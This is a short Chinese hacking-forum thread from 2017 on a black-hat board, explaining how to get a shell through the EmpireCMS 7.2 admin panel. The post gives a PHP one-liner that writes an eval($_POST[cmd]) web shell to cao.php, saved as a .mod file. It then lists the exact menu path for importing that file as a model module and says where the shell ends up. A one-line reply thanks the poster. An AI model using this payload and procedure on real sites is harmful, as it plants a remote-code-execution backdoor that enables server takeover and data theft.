黑帽联盟
标题:
帝国cms7.2后台getshell漏洞
[打印本页]
作者:
yun
时间:
2017-4-14 03:11
标题:
帝国cms7.2后台getshell漏洞
工具/原料
帝国cms
方法/步骤
php一句话内容:
<?fputs(fopen("cao.php","w"),"<?eval(\$_POST[cmd]);?>")?>
保存为1.php.mod
进入后台---系统设置---管理数据表---管理系统模型---导入新型模块
导入之后马儿就躺在了/e/admin/cao.php。
2017-4-14 03:09 上传
下载附件
(17.72 KB)
所以大家用帝国cms的要防范这个漏洞,纯属干货分享。
作者:
权利的游戏
时间:
2017-4-15 04:09
看看,谢谢v
欢迎光临 黑帽联盟 (https://bbs.cnblackhat.com/)
Powered by Discuz! X2.5
